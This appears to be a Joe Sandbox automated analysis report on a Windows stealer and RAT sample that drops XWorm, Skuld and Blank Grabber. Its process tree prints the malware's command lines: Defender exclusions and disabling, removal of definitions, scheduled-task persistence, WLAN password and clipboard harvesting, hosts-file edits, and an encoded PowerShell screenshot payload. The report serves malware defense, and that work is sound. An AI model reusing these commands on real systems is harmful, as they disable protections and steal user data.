Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EternalPredictor.exe

Overview

General Information

Sample name:EternalPredictor.exe
Analysis ID:1557106
MD5:7d207c243b33d6f3d78acadffd95ae0e
SHA1:a3ad8109c208b12d35359e78f4ebc23ed79ccf24
SHA256:dc23f531b2e23535601968a1453a45565c9214264d4ef3d016c0a983ed720c30
Tags:exeuser-aachum
Infos:

Detection

Blank Grabber, Skuld Stealer, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
UAC bypass detected (Fodhelper)
Yara detected Blank Grabber
Yara detected Skuld Stealer
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates multiple autostart registry keys
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Protects its processes via BreakOnTermination flag
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Removes signatures from Windows Defender
Sample uses string decryption to hide its real strings
Sigma detected: Bypass UAC via Fodhelper.exe
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes or reads registry keys via WMI
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • EternalPredictor.exe (PID: 2852 cmdline: "C:\Users\user\Desktop\EternalPredictor.exe" MD5: 7D207C243B33D6F3D78ACADFFD95AE0E)
    • eternal.exe (PID: 5604 cmdline: "C:\Users\user\AppData\Roaming\eternal.exe" MD5: 7439CC991A9A756C41153B8E9121BAAB)
      • schtasks.exe (PID: 4424 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • skuld.exe (PID: 3872 cmdline: "C:\Users\user\AppData\Roaming\skuld.exe" MD5: DBBD2127D1030E4C9548FDF7DE9983A7)
      • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • attrib.exe (PID: 6876 cmdline: attrib +h +s C:\Users\user\AppData\Roaming\skuld.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • attrib.exe (PID: 6088 cmdline: attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • WMIC.exe (PID: 1816 cmdline: wmic csproduct get UUID MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • program.exe (PID: 4464 cmdline: "C:\Users\user\AppData\Roaming\program.exe" MD5: 3E6865657B29FAEA3A355C710F0AAD45)
      • program.exe (PID: 2360 cmdline: "C:\Users\user\AppData\Roaming\program.exe" MD5: 3E6865657B29FAEA3A355C710F0AAD45)
        • cmd.exe (PID: 4920 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5520 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 4940 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2212 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 4004 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6088 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7184 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7320 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 7240 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7400 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 7444 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 7500 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • cmd.exe (PID: 7544 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7908 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7584 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7968 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 7592 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 7952 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 8000 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • cmd.exe (PID: 7672 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 7976 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • cmd.exe (PID: 7656 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • systeminfo.exe (PID: 7960 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
        • cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7984 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
            • csc.exe (PID: 7448 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • cvtres.exe (PID: 2736 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\3pyiazzo\CSC68A32BD75EFB4A1F8C11C6C63FDD8E5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • consent.exe (PID: 7816 cmdline: consent.exe 6092 324 0000019985E22B80 MD5: DD5032EF160209E470E2612A8A3D5F59)
          • svchost.exe (PID: 6092 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • cmd.exe (PID: 7912 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 5032 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 8100 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • getmac.exe (PID: 5496 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
        • cmd.exe (PID: 8136 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 7480 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • cmd.exe (PID: 7816 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 7428 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • cmd.exe (PID: 3828 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
